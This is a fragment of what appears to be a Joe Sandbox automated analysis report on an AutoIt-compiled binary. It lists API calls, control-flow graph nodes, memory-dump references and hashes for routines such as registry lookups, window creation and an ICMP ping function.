                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00E04BFD
                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00E04C3E
                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00E04C80
                                                                                                                                            • _wcslen.LIBCMT ref: 00E04CE7
                                                                                                                                            • _wcslen.LIBCMT ref: 00E04CF6
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                                                            • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                                            • API String ID: 98802146-2727554177
                                                                                                                                            • Opcode ID: dddf78c45aee66ce32928533d0f91e0519182f559e1efc1ce64abf6a96cc4c34
                                                                                                                                            • Instruction ID: 1d16c7fb423d9fec8cfb6fb42d2c123001b6a212eb700768c6e5d0d22a2f1cab
                                                                                                                                            • Opcode Fuzzy Hash: dddf78c45aee66ce32928533d0f91e0519182f559e1efc1ce64abf6a96cc4c34
                                                                                                                                            • Instruction Fuzzy Hash: 56718EB1545301AEC314EF66EC81A9BBBE8FF94340F40042FF555A71A0EB71DA89CB61

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00DC34DE
                                                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00DC34ED
                                                                                                                                            • LoadIconW.USER32(00000063), ref: 00DC3503
                                                                                                                                            • LoadIconW.USER32(000000A4), ref: 00DC3515
                                                                                                                                            • LoadIconW.USER32(000000A2), ref: 00DC3527
                                                                                                                                            • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00DC353F
                                                                                                                                            • RegisterClassExW.USER32(?), ref: 00DC3590
                                                                                                                                              • Part of subcall function 00DC3624: GetSysColorBrush.USER32(0000000F), ref: 00DC3657
                                                                                                                                              • Part of subcall function 00DC3624: RegisterClassExW.USER32(00000030), ref: 00DC3681
                                                                                                                                              • Part of subcall function 00DC3624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00DC3692
                                                                                                                                              • Part of subcall function 00DC3624: InitCommonControlsEx.COMCTL32(?), ref: 00DC36AF
                                                                                                                                              • Part of subcall function 00DC3624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00DC36BF
                                                                                                                                              • Part of subcall function 00DC3624: LoadIconW.USER32(000000A9), ref: 00DC36D5
                                                                                                                                              • Part of subcall function 00DC3624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00DC36E4
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                            • String ID: #$0$AutoIt v3
                                                                                                                                            • API String ID: 423443420-4155596026
                                                                                                                                            • Opcode ID: 722fd9c4038c39b7639f282633079a88c9236416968013cec151995ef650dce0
                                                                                                                                            • Instruction ID: ed9dcc445fa37460c6b62a261be117fad699d1733e93a240b547b1f901ce9834
                                                                                                                                            • Opcode Fuzzy Hash: 722fd9c4038c39b7639f282633079a88c9236416968013cec151995ef650dce0
                                                                                                                                            • Instruction Fuzzy Hash: E821E670900319BFDF14DFA6EC55AAABFB4EB48B50F00451FE608B62A0D7B945498F90

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 553 e40fb8-e40fef call dce6a0 556 e40ff1-e40ffe call dcc98d 553->556 557 e4100f-e41021 WSAStartup 553->557 556->557 565 e41000-e4100b call dcc98d 556->565 558 e41054-e41091 call ddc1f6 call dc8ec0 call ddf9d4 inet_addr gethostbyname 557->558 559 e41023-e41031 557->559 576 e410a2-e410b0 558->576 577 e41093-e410a0 IcmpCreateFile 558->577 561 e41036-e41046 559->561 562 e41033 559->562 566 e41048 561->566 567 e4104b-e4104f 561->567 562->561 565->557 566->567 570 e41249-e41251 567->570 579 e410b5-e410c5 576->579 580 e410b2 576->580 577->576 578 e410d3-e41100 call de017b call dc423c 577->578 589 e41102-e41129 IcmpSendEcho 578->589 590 e4112b-e41148 IcmpSendEcho 578->590 581 e410c7 579->581 582 e410ca-e410ce 579->582 580->579 581->582 584 e41240-e41244 call dcbd98 582->584 584->570 591 e4114c-e4114e 589->591 590->591 592 e41150-e41155 591->592 593 e411ae-e411bc 591->593 596 e411f8-e4120a call dce6a0 592->596 597 e4115b-e41160 592->597 594 e411c1-e411c8 593->594 595 e411be 593->595 601 e411e4-e411ed 594->601 595->594 611 e41210 596->611 612 e4120c-e4120e 596->612 598 e41162-e41167 597->598 599 e411ca-e411d8 597->599 598->593 604 e41169-e4116e 598->604 606 e411dd 599->606 607 e411da 599->607 602 e411f2-e411f6 601->602 603 e411ef 601->603 608 e41212-e41229 IcmpCloseHandle WSACleanup 602->608 603->602 609 e41170-e41175 604->609 610 e41193-e411a1 604->610 606->601 607->606 608->584 616 e4122b-e4123d call de013d call de0184 608->616 609->599 613 e41177-e41185 609->613 614 e411a6-e411ac 610->614 615 e411a3 610->615 611->608 612->608 617 e41187 613->617 618 e4118a-e41191 613->618 614->601 615->614 616->584 617->618 618->601
                                                                                                                                            APIs
                                                                                                                                            • WSAStartup.WS2_32(00000101,?), ref: 00E41019
                                                                                                                                            • inet_addr.WSOCK32(?), ref: 00E41079
                                                                                                                                            • gethostbyname.WS2_32(?), ref: 00E41085
                                                                                                                                            • IcmpCreateFile.IPHLPAPI ref: 00E41093
                                                                                                                                            • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00E41123
                                                                                                                                            • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00E41142
                                                                                                                                            • IcmpCloseHandle.IPHLPAPI(?), ref: 00E41216
                                                                                                                                            • WSACleanup.WSOCK32 ref: 00E4121C
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                            • String ID: Ping
                                                                                                                                            • API String ID: 1028309954-2246546115
                                                                                                                                            • Opcode ID: 62fa2b14b85e02e7643f573699a9d755f34cf4ba5992749e0263877a28555471
                                                                                                                                            • Instruction ID: 2d5c3a9d93df006994171d37c4ec77820b91df53bed1f40d6bdc51c146e7252e
                                                                                                                                            • Opcode Fuzzy Hash: 62fa2b14b85e02e7643f573699a9d755f34cf4ba5992749e0263877a28555471
                                                                                                                                            • Instruction Fuzzy Hash: 6591AD316092419FDB20DF15D888F16BBE0EF44318F1489A9E569EB7A2C730ED85CB91
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: Variable must be of type 'Object'.$t5$t5$t5$t5$t5
                                                                                                                                            • API String ID: 0-3061639177
                                                                                                                                            • Opcode ID: 71c593b6a42840d5556edb97e1ede46b42f8f483400a946ccbad340108f7108b
                                                                                                                                            • Instruction ID: 1e043eb2f65e3b29d09ca84e2f5b1b0fd411d8b97c301723224f397c469a266f
                                                                                                                                            • Opcode Fuzzy Hash: 71c593b6a42840d5556edb97e1ede46b42f8f483400a946ccbad340108f7108b
                                                                                                                                            • Instruction Fuzzy Hash: 34C25C71A002169FCB24DF58C880BEDB7B2FF48314F25816AE955AB391D775ED81CBA0
                                                                                                                                            APIs
                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 00DD15F2
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Init_thread_footer
                                                                                                                                            • String ID: t5$t5$t5$t5$t5
                                                                                                                                            • API String ID: 1385522511-3253990334
                                                                                                                                            • Opcode ID: 32f9425003ed615b7a813d99bf9a8194d5e85521be84966aff55fa03370075ef
                                                                                                                                            • Instruction ID: 93f37bc996c25b25c03bbbb7673019fd7b57101bb005e6d2b6095ab64a9d86d5
                                                                                                                                            • Opcode Fuzzy Hash: 32f9425003ed615b7a813d99bf9a8194d5e85521be84966aff55fa03370075ef
                                                                                                                                            • Instruction Fuzzy Hash: FEB26A74A08341DFCB24DF19C480B2ABBE1FB99304F18495EE9899B351D771ED85CBA2

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00DC327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00DC32AF
                                                                                                                                              • Part of subcall function 00DC327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 00DC32B7
                                                                                                                                              • Part of subcall function 00DC327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00DC32C2
                                                                                                                                              • Part of subcall function 00DC327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00DC32CD
                                                                                                                                              • Part of subcall function 00DC327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 00DC32D5
                                                                                                                                              • Part of subcall function 00DC327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 00DC32DD
                                                                                                                                              • Part of subcall function 00DC3205: RegisterWindowMessageW.USER32(00000004,?,00DC2964), ref: 00DC325D
                                                                                                                                            • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00DC2A0A
                                                                                                                                            • OleInitialize.OLE32 ref: 00DC2A28
                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000), ref: 00E03A0D
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                            • String ID: (&$0$$4'$d($$
                                                                                                                                            • API String ID: 1986988660-3144845333
                                                                                                                                            • Opcode ID: 1bf953894ea514bfdabd0c357a3cc53c0045ef317698c34a4237e1e6b1820864
                                                                                                                                            • Instruction ID: a09144c2be85109bd2eefc68fe12748216cfa1fc989db49250ffc074fe24c862
                                                                                                                                            • Opcode Fuzzy Hash: 1bf953894ea514bfdabd0c357a3cc53c0045ef317698c34a4237e1e6b1820864
                                                                                                                                            • Instruction Fuzzy Hash: 3B71AFB0916201BF8F98DF6BAD666153AE0FB88300742952F9618F7262E770444DCFA6

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 1633 df90c5-df90d5 1634 df90ef-df90f1 1633->1634 1635 df90d7-df90ea call def636 call def649 1633->1635 1636 df9459-df9466 call def636 call def649 1634->1636 1637 df90f7-df90fd 1634->1637 1649 df9471 1635->1649 1654 df946c call df2b5c 1636->1654 1637->1636 1639 df9103-df912e 1637->1639 1639->1636 1642 df9134-df913d 1639->1642 1646 df913f-df9152 call def636 call def649 1642->1646 1647 df9157-df9159 1642->1647 1646->1654 1652 df915f-df9163 1647->1652 1653 df9455-df9457 1647->1653 1655 df9474-df9479 1649->1655 1652->1653 1657 df9169-df916d 1652->1657 1653->1655 1654->1649 1657->1646 1660 df916f-df9186 1657->1660 1662 df9188-df918b 1660->1662 1663 df91a3-df91ac 1660->1663 1666 df918d-df9193 1662->1666 1667 df9195-df919e 1662->1667 1664 df91ae-df91c5 call def636 call def649 call df2b5c 1663->1664 1665 df91ca-df91d4 1663->1665 1697 df938c 1664->1697 1670 df91db-df91dc call df3b93 1665->1670 1671 df91d6-df91d8 1665->1671 1666->1664 1666->1667 1668 df923f-df9259 1667->1668 1673 df925f-df926f 1668->1673 1674 df932d-df9336 call dffc1b 1668->1674 1679 df91e1-df91f9 call df2d38 * 2 1670->1679 1671->1670 1673->1674 1678 df9275-df9277 1673->1678 1685 df93a9 1674->1685 1686 df9338-df934a 1674->1686 1678->1674 1682 df927d-df92a3 1678->1682 1701 df91fb-df9211 call def649 call def636 1679->1701 1702 df9216-df923c call df97a4 1679->1702 1682->1674 1687 df92a9-df92bc 1682->1687 1689 df93ad-df93c5 ReadFile 1685->1689 1686->1685 1691 df934c-df935b GetConsoleMode 1686->1691 1687->1674 1692 df92be-df92c0 1687->1692 1695 df93c7-df93cd 1689->1695 1696 df9421-df942c GetLastError 1689->1696 1691->1685 1698 df935d-df9361 1691->1698 1692->1674 1699 df92c2-df92ed 1692->1699 1695->1696 1705 df93cf 1695->1705 1703 df942e-df9440 call def649 call def636 1696->1703 1704 df9445-df9448 1696->1704 1707 df938f-df9399 call df2d38 1697->1707 1698->1689 1706 df9363-df937d ReadConsoleW 1698->1706 1699->1674 1700 df92ef-df9302 1699->1700 1700->1674 1709 df9304-df9306 1700->1709 1701->1697 1702->1668 1703->1697 1716 df944e-df9450 1704->1716 1717 df9385-df938b call def613 1704->1717 1713 df93d2-df93e4 1705->1713 1714 df937f GetLastError 1706->1714 1715 df939e-df93a7 1706->1715 1707->1655 1709->1674 1719 df9308-df9328 1709->1719 1713->1707 1723 df93e6-df93ea 1713->1723 1714->1717 1715->1713 1716->1707 1717->1697 1719->1674 1727 df93ec-df93fc call df8de1 1723->1727 1728 df9403-df940e 1723->1728 1740 df93ff-df9401 1727->1740 1733 df941a-df941f call df8c21 1728->1733 1734 df9410 call df8f31 1728->1734 1738 df9415-df9418 1733->1738 1734->1738 1738->1740 1740->1707
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 9c99fdde934a4ed92359d9fd5f1ead1a4864920c9e59cd9e2e6574fcb25c14bc
                                                                                                                                            • Instruction ID: 9562ff1b230dc0c0551bb15170eab30020bdd451074f0a63556d367e8303b903
                                                                                                                                            • Opcode Fuzzy Hash: 9c99fdde934a4ed92359d9fd5f1ead1a4864920c9e59cd9e2e6574fcb25c14bc
                                                                                                                                            • Instruction Fuzzy Hash: 55C1E470E0424DAFCF11EFA9D851BBDBBB0AF19310F098099EA54A7392C7319946CB71

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 1777 dc35b3-dc3623 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                            APIs
                                                                                                                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00DC35E1
                                                                                                                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00DC3602
                                                                                                                                            • ShowWindow.USER32(00000000,?,?,?,?,?,?,00DC3368,?), ref: 00DC3616
                                                                                                                                            • ShowWindow.USER32(00000000,?,?,?,?,?,?,00DC3368,?), ref: 00DC361F
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$CreateShow
                                                                                                                                            • String ID: AutoIt v3$edit
                                                                                                                                            • API String ID: 1584632944-3779509399
                                                                                                                                            • Opcode ID: 73c854eb2ed826e55fcb79f7f70e3866a05a1113ed7f258a11049aeb6855339e
                                                                                                                                            • Instruction ID: bd9822cdef9190c42c81262e43a4a8db7e1cbaa020b373dacbbeb76599bc436a
                                                                                                                                            • Opcode Fuzzy Hash: 73c854eb2ed826e55fcb79f7f70e3866a05a1113ed7f258a11049aeb6855339e
                                                                                                                                            • Instruction Fuzzy Hash: CFF03A706043967EEB3187236C08E7B2EBDD7CAF10B00041FBA04B7160D2A90889DAB0

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00E05287
                                                                                                                                              • Part of subcall function 00DC8577: _wcslen.LIBCMT ref: 00DC858A
                                                                                                                                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00DC6299
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: IconLoadNotifyShell_String_wcslen
                                                                                                                                            • String ID: Line %d: $AutoIt - $\+
                                                                                                                                            • API String ID: 2289894680-1638154863
                                                                                                                                            • Opcode ID: cfed29cdef4a9ed11ff99e512361234ba8d4c98efd12919a3b3e377585b768d8
                                                                                                                                            • Instruction ID: 3d32768a973605a30bc5eff889904320653071616a51ecbaefeec53fbf34c25d
                                                                                                                                            • Opcode Fuzzy Hash: cfed29cdef4a9ed11ff99e512361234ba8d4c98efd12919a3b3e377585b768d8
                                                                                                                                            • Instruction Fuzzy Hash: D5415171408306AAC711EB60DC45FDFB7A8EF44320F14462EF599A31A1DB74D649CBB6

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 1829 df8a2e-df8a42 call df5737 1832 df8a48-df8a50 1829->1832 1833 df8a44-df8a46 1829->1833 1835 df8a5b-df8a5e 1832->1835 1836 df8a52-df8a59 1832->1836 1834 df8a96-df8ab6 call df56a6 1833->1834 1846 df8ab8-df8ac2 call def613 1834->1846 1847 df8ac4 1834->1847 1839 df8a7c-df8a8c call df5737 CloseHandle 1835->1839 1840 df8a60-df8a64 1835->1840 1836->1835 1838 df8a66-df8a7a call df5737 * 2 1836->1838 1838->1833 1838->1839 1839->1833 1849 df8a8e-df8a94 GetLastError 1839->1849 1840->1838 1840->1839 1851 df8ac6-df8ac9 1846->1851 1847->1851 1849->1834
                                                                                                                                            APIs
                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,?,OV,00DF894C,?,00E89CE8,0000000C,00DF89AB,?,OV,?,00E0564F), ref: 00DF8A84
                                                                                                                                            • GetLastError.KERNEL32 ref: 00DF8A8E
                                                                                                                                            • __dosmaperr.LIBCMT ref: 00DF8AB9
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                                            • String ID: OV
                                                                                                                                            • API String ID: 2583163307-2262073888
                                                                                                                                            • Opcode ID: e14e8239117c0133db0a1b6653b4048e3a3ee5eca2aa864321086e57264197e6
                                                                                                                                            • Instruction ID: 998587a65d852979f6acce8c2ed7ee7a1171b1e4028008050458736895f7d8c9
                                                                                                                                            • Opcode Fuzzy Hash: e14e8239117c0133db0a1b6653b4048e3a3ee5eca2aa864321086e57264197e6
                                                                                                                                            • Instruction Fuzzy Hash: FB01E5326051685AC7246234BC4577E7745CB82738F2B815BFB149B1D2DF2089C065B2
                                                                                                                                            APIs
                                                                                                                                            • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00DC58BE,SwapMouseButtons,00000004,?), ref: 00DC58EF
                                                                                                                                            • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00DC58BE,SwapMouseButtons,00000004,?), ref: 00DC5910
                                                                                                                                            • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00DC58BE,SwapMouseButtons,00000004,?), ref: 00DC5932
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                                                            • String ID: Control Panel\Mouse
                                                                                                                                            • API String ID: 3677997916-824357125
                                                                                                                                            • Opcode ID: 6d9603f17f6f9483f259ffd4d97e58fa02c9fadf4ee68e94f8c97b00398ad64d
                                                                                                                                            • Instruction ID: 4c0bce850cefab910d81274150d67c54c213c4e02088da495a722ff47707536a
                                                                                                                                            • Opcode Fuzzy Hash: 6d9603f17f6f9483f259ffd4d97e58fa02c9fadf4ee68e94f8c97b00398ad64d
